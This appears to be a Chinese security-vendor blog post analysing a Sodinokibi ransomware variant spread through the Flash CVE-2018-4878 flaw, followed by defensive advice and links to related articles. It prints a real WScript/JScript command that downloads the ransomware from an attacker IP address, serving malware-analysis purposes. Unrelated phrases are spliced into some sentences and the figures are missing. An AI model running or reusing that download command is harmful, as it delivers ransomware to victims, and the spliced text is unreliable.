Sodinokibi勒索病毒利用Flash漏洞强势来袭
自GandCrab宣布停止运营以来,勒索病毒攻击事件并没有随着GandCrab的退出而减少,全球各地每天仍有用户因为数据遭到加密而损失惨重。在后来居上的各个勒索病毒家族中,Sodinokibi勒索已经成为了现在全球最流行的勒索病毒之一,也叫称为GandCrab的”接班人”。
Sodinokibi勒索病毒的部分变种在加密后会将受害主机的屏幕设置成深蓝色,因此也被称为“DeepBlue”勒索,早在该勒索病毒活动的初期,深信服安全团队就已捕获到其利用Confluence漏洞(CVE-2019-3396)进行攻击的案例:
《警惕“侠盗”团伙利用新型漏洞传播GandCrab勒索“蓝屏”变种》
详细链接: https://mp.weixin.qq.com/s/0-5xweSvuGpDhHdNAMO6qg.
近日,国外安全研究人员发现Sodinokibi勒索病毒利用CVE-2018-4878漏洞进行传播,深信服安全团队第一时间捕获到了相应的样本,并进行了详细分析。
一、漏洞利用分析
CVE-2018-4878漏洞是一个UAF漏洞,位于Flash的com.adobe.tvsdk包中,如下所示:PHP大马
shellcode代码通过获取CreateProcessA的函数地址,调用CMD命令执行恶意下载操作,如下所示:
动态调式,获取CMD命令,如下所示:
获取的CMD命令代码,如下所示:
通过CMD命令,调用WScript进程执行脚本,如下所示:
调用脚本命令参数,如下所示:
脚本内容,如下所示:
wsCripT //B //E:JScript T.t "ctELwuzs5N95a" "http://176.57.220.28/?NTcxMDkx&OHqFPlRweVwKRC&PbNNzQhVmHSdZF=difference&t4tsdfsg4=7cDOArojBfTcwxlmosOVl1B86D7i0fVz0LPhJ6FqEfeNA0U_aKTErg92lr8zLgkLYsk9w&SGZPTVoZDZUE=constitution&mtcfabVTX=referred&TfDencoKhLpWmWy=detonator&CMIHZK=everyone&jsUXxcuwwzXQs=known&niJebNseKTId=detonator&SkHDbOnITQuC=wrapped&fwFOBGCULm=professional&AiNfixYteBuTPc=professional&wpdPCwSHxUCq=community&ff5sdfds=w3nQMvXcJxnQFYbGMv3DSKNbNkbWHViPxoiG9MildZmqZGX_k7vDfF-qoVXcCgWRxfQuf&LUbaPnkXKQhJ=known&pUljixFjY=community&fspuvfWRXEoRhF=known&UolvaBlNUoGliy=referred&dcavylKzLRHQNDE2Nzk4" "?
通过脚本下载Sodinokibi勒索病毒,能通过动态调试,提取出里面核心Payload,如下所示:
将此勒索变种的核心功能代码与我们之前捕获分析的Sodinokibi勒索病毒核心代码进行对比分析,如下所示:
代码的相似度达到94%以上,可以认定为是Sodinokibi勒索病毒的变种样本,此勒索病毒变种生成的最新的“蓝屏”桌面背景,如下所示:
生成的勒索信息文本,如下所示:
解密的网址,如下所示:
二、解决方案
遗憾的是,这款病毒暂时还没有解密工具,建议尽快对感染主机进行断网隔离。深信服提醒广大用户尽快做好病毒检测与防御措施,防范该病毒家族的勒索攻击。奇热影视
病毒防御
深信服安全团队再次提醒广大用户,勒索病毒以防为主,目前大部分勒索病毒加密后的文件都无法解密,注意日常防范措施:
1、及时给电脑打补丁,修复漏洞。
2、对重要的数据文件定期进行非本地备份。
3、不要点击来源不明的邮件附件,不从不明网站下载软件。
4、尽量关闭不必要的文件共享权限。
5、更改账户密码,设置强密码,避免使用统一的密码,因为统一的密码会导致一台被攻破,多台遭殃。
6、如果业务上无需使用RDP的,建议关闭RDP。
最后,建议企业对全网进行一次安全检查和杀毒扫描,加强防护工作。
Sodinokibi勒索病毒利用Flash漏洞强势来袭相关推荐
- 垃圾邮件冒充中国工商银行传播Sodinokibi勒索病毒
Sodinokibi勒索病毒在国内首次被发现于2019年4月份,2019年5月24日首次在意大利被发现,在意大利被发现使用RDP攻击的方式进行传播感染,这款病毒被称为GandCrab勒索病毒的接班人, ...
- 【安全预警公告】新勒索病毒Bad Rabbit(坏兔子)来袭,请做好防御准备
2017年10月24日,国外媒体报道出现了一种新的勒索病毒--Bad Rabbit(坏兔子),该勒索病毒最早在俄罗斯和乌克兰出现,跟之前的NotPetya勒索病毒功能上有很多相同的代码实现,比如创 ...
- 新勒索病毒Bad Rabbit(坏兔子)来袭,请做好防御准备
点击有惊喜 2017年10月24日,国外媒体报道出现了一种新的勒索病毒--Bad Rabbit(坏兔子),该勒索病毒最早在俄罗斯和乌克兰出现,跟之前的NotPetya勒索病毒功能上有很多相同的代码 ...
- 勒索软件利用IE漏洞挂马传播,腾讯零信任iOA、腾讯电脑管家支持检测拦截
腾讯安全检测到有网络黑产利用微软9月份和3月份已修复的两个IE 高危漏洞构造恶意广告页面挂马攻击,当存在漏洞的系统访问攻击者恶意构造的页面时,会触发恶意代码执行,之后下载Magniber勒索软件. M ...
- 微软警告称Flame病毒利用Windows漏洞
微软警告称,中东爆发一种叫Flame的病毒,它利用了Windows操作系统的漏洞. 微软已经发布软件反击病毒,修补之前未发现的漏洞.微软安全响应中心资深总监麦克.瑞维(Mike Reavey)在博客中 ...
- 常见被病毒利用的漏洞补丁
近期较忙,几乎没时间打理博客.近期遇到了很多利用系统漏洞传播的病毒,而且该漏洞都是以前很久发布的.为了方便自己同时也可以给广大朋友提供参考,将一些常见的系统漏洞信息及补丁收集在一起. MS03-026 ...
- 警惕!勒索病毒DXXD 2.0版来袭,黑客称只能缴纳赎金无法破解
一波未平,一波又起. 10月13日,有一起突发事件:据受害者爆料,本来一路心情愉快地去上班,开机却遭遇突发异常状况:"昨天下班前电脑还好好的,今天突然开机之后电脑突然很卡,我并没有在意.结果 ...
- java程序拦截dde漏洞问题_勒索病毒又更新 Office DDE漏洞被利用
勒索软件已见怪不怪了,下半年每天都有新的勒索软件出现,中毒电脑文件被高强度加密,能恢复的极为罕见,受害用户损失惨重.勒索病毒的攻击手法也无所不用其极,本周末,金山毒霸安全实验室再次截获最新的勒索软件, ...
- 【转载】撒旦(Satan 4.2)勒索病毒最新变种加解密分析
[转载]原文来自:https://bbs.kafan.cn/thread-2135007-1-1.html 一.概述 近日,腾讯御见威胁情报中心检测到一大批的服务器被入侵,入侵后被植入勒索病毒.经过分 ...
- 勒索病毒频发下如何防勒索病毒
近期,Magniber勒索病毒攻击事件频发,全国多地网民.政企用户受到波及,并在不同程度受到影响,Magniber勒索病毒利用CVE-2021-40444漏洞进行传播,还使用PrintNightmar ...
最新文章
- pytorch报错Unable to get repr for
- C#开发微信门户及应用(5)--用户分组信息管理
- 举头望明月打计算机术语,精选有关月亮的灯谜大全
- Android View的加载过程
- 2017-12-04HTML布局_div布局
- NJUST1712(形成三角形面积为整数的个数)
- 根据日期累计求和_excel条件求和技巧:应用SUMIF函数计算客户余款
- apache大师+伪静态_Apache开启伪静态示例
- 自动清除html无用css,TinyMCE粘贴HTML代码,避免style属性被自动清除_html/css_WEB-ITnose...
- mybatis里面返回list集合
- 多出多个虚拟显示器的解决方法
- HH的项链(树状数组)区间内不同的数量
- 计算三角形的周长和面积
- UOJ #11. 【UTR #1】ydc的大树
- Java工程师是做什么的?学习java能干什么?
- 全志T7/T507 Qt5.12.5移植记录
- call()与appy()
- 5类适合参加IT培训的人,你在其中吗?
- iBatis数据库字段映射到Java对象。
- 软考高项 : (01)论信息系统项目的人力资源管理